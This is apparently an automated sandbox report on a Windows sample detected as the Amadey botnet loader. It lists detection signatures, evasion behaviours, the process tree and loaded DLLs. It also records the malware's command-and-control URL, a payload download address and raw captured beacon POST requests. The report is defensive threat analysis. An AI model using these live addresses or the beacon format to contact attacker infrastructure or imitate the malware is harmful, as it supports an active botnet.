Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502480
MD5:	457d9a15d305df62fe34c5076f3cad9d
SHA1:	7a068fb1e761874759a89534f39c1eb109367448
SHA256:	572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 7108 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 457D9A15D305DF62FE34C5076F3CAD9D)

explorti.exe (PID: 4940 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 457D9A15D305DF62FE34C5076F3CAD9D)

explorti.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 457D9A15D305DF62FE34C5076F3CAD9D)

explorti.exe (PID: 7756 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 457D9A15D305DF62FE34C5076F3CAD9D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000003.1701960720.0000000004B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.explorti.exe.a00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.explorti.exe.a00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.explorti.exe.a00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.850000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T20:07:49.855958+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-09-01T20:09:06.811186+0200
SID:	2803305
Severity:	3
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T20:09:05.654798+0200
SID:	2856147
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeWindows	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpQ	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeta	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe6522427f	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php6	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeD	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ws	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe00	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ata	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exem32	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe5	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: explorti.exe.7756.7.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.19/Vi9leo/index.php	Virustotal: Detection: 24%	Perma Link
Source: http://185.215.113.19/Vi9leo/index.php6	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/ws	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/steam/random.exe	Virustotal: Detection: 23%	Perma Link
Source: http://185.215.113.16/steam/random.exe6522427f	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Virustotal: Detection: 54%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49737

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.19

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 18:09:06 GMTContent-Type: application/octet-streamContent-Length: 1826304Last-Modified: Sun, 01 Sep 2024 15:41:45 GMTConnection: keep-aliveETag: "66d48b39-1bde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 a0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 69 00 00 04 00 00 f8 9a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 6f 64 6b 70 65 62 00 70 1a 00 00 20 4f 00 00 68 1a 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 67 73 6d 66 71 66 00 10 00 00 00 90 69 00 00 04 00 00 00 b8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 69 00 00 22 00 00 00 bc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 37 32 41 37 38 42 31 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7AB72A78B15E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16

Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_00A0BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,

7_2_00A0BD60

Source: global traffic

HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ata
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe00
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe5
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6522427f
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeD
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeWindows
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exem32
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeta
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ws
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .rsrc
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .idata
Source: 2c422e6624.exe.7.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A0E440	7_2_00A0E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A04CF0	7_2_00A04CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A43068	7_2_00A43068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A37D83	7_2_00A37D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A04AF0	7_2_00A04AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A4765B	7_2_00A4765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A42BD0	7_2_00A42BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A48720	7_2_00A48720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A46F09	7_2_00A46F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A4777B	7_2_00A4777B

Source: random[1].exe.7.dr	Static PE information: Data appended to the last section found
Source: 2c422e6624.exe.7.dr	Static PE information: Data appended to the last section found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9999786543715847
Source: file.exe	Static PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9999786543715847
Source: explorti.exe.0.dr	Static PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
Source: random[1].exe.7.dr	Static PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006
Source: 2c422e6624.exe.7.dr	Static PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@0/2

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Roaming\1000051000\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
